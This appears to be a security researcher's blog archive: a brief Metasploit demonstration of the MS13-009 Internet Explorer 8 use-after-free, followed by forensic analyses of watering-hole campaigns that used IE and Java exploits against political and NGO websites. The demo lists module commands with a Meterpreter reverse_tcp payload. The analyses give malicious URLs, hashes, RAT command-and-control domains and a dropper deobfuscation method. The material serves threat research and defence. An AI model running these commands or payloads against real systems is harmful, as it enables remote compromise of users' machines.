Tag Archives: Internet Explorer

MS13-009 Microsoft Internet Explorer SLayoutRun UAF Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Scott Bell
Coordinated public release of the vulnerability the 2013-02-12
Metasploit PoC provided the 2013-02-21

PoC provided by :

Scott Bell

Reference(s) :

CVE-2013-0025
OSVDB-90122
BID-57830
MS13-009

Affected version(s) :

Internet Explorer 8

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

This module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a CParaElement node is released but a reference is still kept in CDoc. This memory is reused when a CDoc relayout is performed.

Commands :

use exploit/windows/browser/ms13_009_ie_slayoutrun_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

A Deeper Look In CVE-2012-4792 Watering Hole Campaigns – Alljap Chapter

This post is a small part of an in-depth analysis of the watering hole campaign of December involving an Internet Explorer 0day.  Jindrich Kubec and my self are working hard in order to synthesize all these information’s in order to provide you a high level overview.

As I mentioned to threatpost.com, the 14th January, additional web sites were discovered hosting Internet Explorer CVE-2012-4792 exploit. One of the additional web site was “All Jap auto parts” (www.alljap.net), an importer of second-hand japanese engines and car parts located in Brisbane, Queensland, Australia.

StopMalvertising published an analysis I recommend to you for additional information’s.

When I discovered this infected web, I noticed initially that the files were time stamped (HTTP Last-Modified entity-header) at the following dates:

  • deployJava.js : Fri, 14 Dec 2012 15:47:42 GMT
  • index.html : Fri, 14 Dec 2012 15:49:58 GMT
  • news.html : Fri, 14 Dec 2012 15:50:42 GMT
  • robots.txt : Fri, 14 Dec 2012 15:50:57 GMT
  • today.swf : Fri, 14 Dec 2012 15:51:08 GMT
  • xsainfo.jpg : Fri, 14 Dec 2012 15:56:44 GMT

index.html” file was supporting chinese simplified (zh-cn), taiwanese mandarin (zh-tw), japanese (ja), american english (en-us) and russian (ru). “girl” and “boy” patterns were present. And “hello” text was hidden.

CFR.org version of “index.html”, I discovered in Google cache and dating from the 7 December, was only supporting chinese simplified (zh-cn), taiwanese mandarin (zh-tw) and american english (en-us). “girl” and “boy” patterns were also present and “hello” text was not hidden.

CFR.org version, reported by FireEye, of around the 20 December, was supporting chinese simplified (zh-cn), taiwanese mandarin (zh-tw), japanese (ja), american english (en-us), russian (ru) and korean (ko). “girl” and “boy” patterns were no more present and replace by “ms-help:” technique to bypass ASLR on Windows 7. Also “hello” text was hidden.

By only analyzing these samples, from CFR.org and All jap auto part, we can observe that the attackers have changed tactics multiple times during this campaign.

By analyzing all the samples of other infected web sites (around 40 infected web sites samples), I observed that the All jap auto part was not used in the watering hole campaign. No high value legit websites where including, by iframe or by JavaScript inclusion, this website.

By doing some further analysis, regarding All jap auto part, I observed initially that hosted phpmyfaq and wwwboard tools were not updated since a long time. And after some Google dorks, I found two PHP backdoors and the Apache logs (from 13 November to beginning February) who were freely accessible from Internet. We will name the first backdoor BK1 and the second BK2 for further references in this blog post.

Having free access to the logs, was an unique opportunity to find additional evidences, regarding the attackers and the differences in the samples and patterns.

I first researched, in the logs, accesses to the backdoors. BK1 was not present in the logs, but BK2 was accessed the 7 December by IP 112.175.234.199. The IP is located in South Korea and is associated to FlyVPN.com VPN mirror. User agent associated to this IP is Internet Explorer 8 under Windows XP.

112.175.234.199 – – [07/Dec/2012 00:31:22 +0000] “GET /BK2.php HTTP/1.1” 200 371 “-” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)”

By searching additional references to this IP, we can observe a first access to CVE-2012-4792 exploit the 7 December with a different user agent, Firefox 12 under Windows XP.

112.175.234.199 – – [07/Dec/2012 01:18:59 +0000] “GET /wwwboard/news/index.html HTTP/1.1” 200 5776 “http://www.gbn.com/” “Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0”

We can directly observe that the HTTP referer was Global Business Network (www.gbn.com) and that All jap auto part was also involved in a watering hole campaign. Description of GBN:

GBN helps organizations adapt and grow in an increasingly uncertain and volatile world. Using our leading-edge tools and expertise—scenario planning, experiential learning, networks of experts and visionaries—we enable our clients to address their most critical challenges and gain the insight, confidence, and capabilities they need to shape the future.

We can also confirm, like CFR.org, that the exploit was present on All jap auto part since minimum the 7 December.

By doing a complete log analysis we can observe the following time line and information’s.

Alljap - 112.175.234.199 - South Korea IP Activities

DatesUser AgentsActions
07/Dec/2012 00:31:22Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access to BK2
07/Dec/2012 00:31:25 to 00:32:47Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
07/Dec/2012 00:32:58Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Modify mail.php through BK2
07/Dec/2012 00:33:10Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Modify tw.htm through BK2
07/Dec/2012 00:33:24 to 00:40:05Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
07/Dec/2012 01:18:59Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Test 0day through GBN.com
07/Dec/2012 17:55:15Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Test 0day through GBN.com

This IP has directly access to BK2, no other web pages visits. You can observe that some PHP mail code (mail.php) was put in place in order to send spear phishing email targeted to Taiwanese people’s (tw.htm). Bunch of operations have been done through BK2. Also you can observe that they test the exploit with Firefox 12.

Alljap - 113.30.106.94 - South Korea IP Activities

DatesUser AgentsActions
10/Dec/2012 08:15:34Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Check presence of 0day
10/Dec/2012 08:15:56 to 08:19:00Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
10/Dec/2012 08:19:25Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access to demo.txt (demo~) file
10/Dec/2012 08:19:34Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Test 0day
10/Dec/2012 08:20:13 to 08:22:11Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
10/Dec/2012 08:27:30 to 08:29:54Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Test 0day through GBN.com

This IP has directly access to BK2, no other web pages visits, and manipulate the content of CVE-2012-4792 0day. The IP is located in South Korea with only a pptp VPN open port. You can also observe usage of a file named “demo.txt”.

Alljap - 59.124.14.102 - Taiwan IP Activities

DatesUser AgentsActions
10/Dec/2012 08:42:34Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access to BK2
10/Dec/2012 08:42:38 to 08:44:00Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
10/Dec/2012 08:54:36 to 08:54:49Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Test 0day through GBN.com
10/Dec/2012 09:09:52 to 09:09:57Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
10/Dec/2012 09:11:08 to 09:11:55Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access 0day files
10/Dec/2012 09:12:14 to 09:13:18Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Test presence of deployJava.js
10/Dec/2012 09:13:41 to 09:15:36Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
10/Dec/2012 09:23:10 to 09:28:11Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Operations through BK2

This IP has directly access to the BK2, no other web pages visits, manipulate the content of CVE-2012-4792 0day and do some test from GBN.com. The IP is located in Taiwan with only a pptp VPN open port.

Alljap - 112.213.97.39 - Hong-Kong IP Activities

DatesUser AgentsActions
14/Dec/2012 15:44:40Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access to BK2
14/Dec/2012 15:44:47 to 15:49:58Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2

This IP has directly access to the BK2, no other web pages visits, manipulate the content of CVE-2012-4792 0day. The IP is located in Hong-Kong with only a pptp VPN open port.

Alljap - 113.30.106.92 - South Korea IP Activities

DatesUser AgentsActions
14/Dec/2012 15:50:42Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access to BK2
14/Dec/2012 15:50:57 to 15:52:57Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2

This IP has directly access to the BK2, no other web pages visits, manipulate the content of CVE-2012-4792 0day. The IP is located in South Korea with only a pptp VPN open port.

Alljap - 110.4.82.38 - South Korea IP Activities

DatesUser AgentsActions
14/Dec/2012 15:54:14Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Check presence of demo.txt file
14/Dec/2012 15:55:04Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access to BK2
14/Dec/2012 15:56:44Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operation through BK2
14/Dec/2012 16:02:19 to 16:03:56 Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Test 0day through GBN.com
16/Dec/2012 12:08:45 Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Test 0day through GBN.com

This IP has directly access to the BK2, no other web pages visits, manipulate the content of CVE-2012-4792 0day and do some test from GBN.com. The IP is located in South Korea.

As you can see the attackers have use massively VPN connexions in order to connect themselves to BK2. If you compare the “Last-Modified” HTTP headers of the samples, you can see that they are corresponding to the last three different IPs manipulations.

As we have the complete Apache logs, I was also able to analyze the attack surface of the watering hole campaign through GBN.

My first analysis was to see all successful hits to “index.html” file from 7 December to 17 December, without any segregation. By clicking on the following link you will access to a Google Fusion Table providing all associated information’s.

alljap-all-hits

You can find also the TOP 10 of countries how have hit the exploit.

Alljap - All Hits TOP 10 Countries

CountryUnique IP count
US311
BR77
CN64
TR44
GB30
DE25
CA23
IN19
FR19
MX18

My second analysis was to see all potential successful exploitation targeting “MSIE 8.0“, from 7 December to 17 December. By clicking on the following link you will access to a Google Fusion Table providing all associated information’s.

alljap-msie8-hits

You can find also the TOP 10 of countries how have hit the exploit.

Alljap - All MSIE 8.0 Hits TOP 10 Countries

CountryUnique IP count
US35
CN13
TR5
BR3
GB3
RO3
MA3
AU3
HK2
TH2

You can see that the potential success rate, compared to the visitors of GBN is very low. The fact to use a 0day only capable to target MSIE 8.0 was clearly a limiting point.

As explained at the beginning of the blog post, the post is only a small part of that has been analyzed. Jindrich Kubec and me will provide you additional information’s soon.

Reporters Without Borders Victim of Watering Hole Campaign

As mentioned by Jindrich on Twitter, it seems that the entity or entities behind the watering hole attacks don’t care to be caught or detected and it also seems that they don’t care if the Internet Explorer and Java vulnerability are patched. They act as the opportunists and try to take advantage from the timeframe between the patch release and the patch application of some users, companies and non-governmental organizations.

Last week me and Jindrich Kubec reported on watering hole attacks against multiple high value web sites, including as example major Hong Kong political parties. These websites used the latest Internet Explorer (CVE-2012-4792) vulnerability, patched in MS13-008, but also the latest Java (CVE-2013-0422) vulnerability, patched in Oracle Java 7 Update 11.

It seems that one week later, Reporters Without Borders, a French-based international non-governmental organization that advocates freedom of the press and freedom of information, is the new web site used for the watering hole campaign. Such an organization is an ideal target for watering hole campaign, as it seems right now the miscreants concentrate only on human rights/political sites – many Tibetian, some Uygur, and some political parties in Hong Kong and Taiwan which are the latest hits in this operation. In our opinion the finger could be safely pointed to China (again).

Like for the Hong Kong political party, the english version of RWB was doing a javascript inclusion to “hxxp://en.rsf.org/local/cache-js/m.js“.

rsf-en-m.js-file

rsf-en-traffic

The “m.js” file creates a cookie “Somethingbbbbb” with one day expiration date. The cookie name could be linked to the Hong Kong political party “m.js” cookie name which was “Somethingeeee“. This kind of cookies was already used two years ago in similar attacks with different exploits.

If Internet Explorer 8 is used an iframe is loaded from”hxxp://newsite.acmetoy.com/m/d/pdf.html” file. Otherwise two iframes will load “hxxp://98.129.194.210/CFIDE/debug/includes/java.html“ and “hxxp://newsite.acmetoy.com/m/d/javapdf.html“.

newsite.acmetoy.com analysis

newsite.acmetoy.com” web site is hosting the following CVE-2012-4792 related files:

  • pdf.html” (ffe715a312a488daf3310712366a5024) : Traditional “DOITYOUR” obfuscated Javascript file which attempts to exploit the latest Internet Explorer vulnerability, CVE-2012-4792.
  • logo1229.swf” (da0287b9ebe79bee42685510ac94dc4f) : Traditional “DOITYOUR” variant of “today.swf“.
  • DOITYOUR02.html” (cf394f4619db14d335dde12ca9657656) : Traditional “DOITYOUR” variant of “news.html“.
  • DOITYOUR01.txt” (a1f6e988cfaa4d7a910183570cde0dc0) : Traditional “DOITYOUR” variant of “robots.txt“.

newsite.acmetoy.com” web site is also hosting the following Java vulnerabilities related files:

  • javapdf.html” (b32bf36160c7a3cc5bc765672f7d6f2c) : Javascript file for CVE-2013-0422 or CVE-2011-3544 exploitation.
  • AppletHigh.jar” (f02ffa2b293ff370d0ea3499d0ade9bd) : CVE-2013-0422 exploit.
  • AppletLow.jar” (1da8f77dde43f55585896eddaff43896) : CVE-2011-3544 exploit.

98.129.194.210 analysis

98.129.194.210” web site is hosting the following Java vulnerabilities related files, as you can see, they’re completely same as the above and most probably serve only as a backup server in case of takedown.

  • java.html” (b32bf36160c7a3cc5bc765672f7d6f2c) : Javascript file for CVE-2013-0422 or CVE-2011-3544 exploitation.
  • AppletHigh.jar” (f02ffa2b293ff370d0ea3499d0ade9bd) : CVE-2013-0422 exploit.
  • AppletLow.jar” (1da8f77dde43f55585896eddaff43896) : CVE-2011-3544 exploit.

These binaries were dropped by the exploits :

  • 686D0E4FAEE4B0EF93A8B9550BD544BF334A6D9B495EC7BE9E28A0F681F5495C, which is remote access tool (RAT) programmed to contact “luckmevnc.myvnc.com” (112.140.186.252, Singapore) or “luckmegame.servegame.com” (currently parked).
  • A14CCC5922EFC6C7CEC1BB58C607381C99967ED4B7602B7427B081209AAF1656 is an interesting injector which downloads something which pretends to be an error webpage, decodes its content which is in fact position independent code which is later injected to another process. This is also RAT, contacting “d.wt.ikwb.com” (58.64.179.139, Hong Kong).

We’ve contacted RSF webmaster and the code should be already removed. Avast and other anti-virus product users are protected on multiple levels against this threat, also updating to latest versions of the vulnerable software packages is a must. Or getting rid of them, as most users can safely replace MSIE with another browser and completely uninstalling Java, reducing the attack surface.

Watering Hole Campaign Use Latest Java and IE Vulnerabilities

Through a collaboration with (Jindrich Kubec (@Jindroush), Director of Threat Intelligence at avast! / Eric Romang (@eromang), independent security researcher), we can confirm that the watering hole campaigns are still ongoing, targeting multiple web high value web sites, including as example a major Hong Kong political party. We can also confirm that a second major Hong Kong political party is victim of this watering hole campaign.

This website is actually using the new version of the original Internet Explorer (CVE-2012-4792) vulnerability attack, patched in MS13-008, but right now it’s also using the latest Java (CVE-2013-0422) vulnerability, patched in Oracle Java 7 Update 11.

We will provide you further details on the affected web sites after their cleaning.

Chinese language version of the targeted web site is doing a remote javascript inclusion to “hxxp://www.[REDACTED].org/board/data/m/m.js“.

malicious-javascript-inclusion

This website is a legitimate compromised website used for hosting the exploit files, hosted in South Korea.

This include file uses the well-known “deployJava” function, aka “deployJava.js“, and creates a cookie “Somethingeeee” with one day expiration date. This cookie is quite strange and it’s also possible to find it in years old exploits, which suggests this is only a part of greater, long-going operation.

mt.html-file-2

If Internet Explorer 8 is used , an iframe is load from”hxxp://www.[REDACTED].org/board/data/m/mt.html” file. Otherwise and if Oracle Java is detected, an iframe will load “hxxp://www.[REDACTED].org/board/data/m/javamt.html“.

Analysis of “mt.html

mt.html” (d85e34827980b13c9244cbcab13b35ea) file is an obfuscated Javascript file which attempts to exploit the latest Internet Explorer vulnerability, CVE-2012-4792, fixed in MS13-008 and provided by Microsoft Monday morning.

https://www.virustotal.com/file/58588ce6d0a1e042450946b03fa4cd92ac1b4246cb6879a7f50a0aab2a84086a/analysis/ (avast detects this code as JS:Bogidow-A [Expl] through Script Shield component).

Comparing to the original CFR and Capstone Turbine versions, this code is not targeting certain browser supported language, but the code is based on the version used on CFR with “boy” and “girl” patterns.

Traditional “today.swf” has been replaced with “logo1229.swf” (da0287b9ebe79bee42685510ac94dc4f), “news.html” has been replaced with “DOITYOUR02.html” (cf394f4619db14d335dde12ca9657656) and “robots.txt” has been replaced with “DOITYOUR01.txt” (a1f6e988cfaa4d7a910183570cde0dc0). The traditional dropper “xsainfo.jpg” is now embedded in the “mt.html” file and obfuscated in the Javascript.

The executable file can be extracted from the string by cutting of first 13 characters, converting hex chars to binary and xoring the whole binary blob with 0xBF. Resulting file with SHA256 CE6C5D2DCF5E9BDECBF15E95943F4FFA845F8F07ED2D10FD6E544F30A9353AD2 is RAT which is communicating with a domain hosted in Hong Kong by New World Telecom.

Analysis of “javamt.html

javamt.html” (b32bf36160c7a3cc5bc765672f7d6f2c) is checking if Oracle Java 7 is present, if yes latest Java vulnerability, CVE-2013-0422, will be executed through “AppletHigh.jar” (521eab796271254793280746dbfd9951). If Oracle Java 6 is present, “AppletLow.jar” (2062203f0ecdaf60df34b5bdfd8eacdc) will exploit CVE-2011-3544. Both these applets contain the very same binary mentioned above (unencrypted).

javamt.html-file

Conclusion

As you see, the watering hole campaign still continues, but has evolved in form but also by using the latest Oracle Java vulnerability. There is just one advise: patch, patch, patch… and see you soon.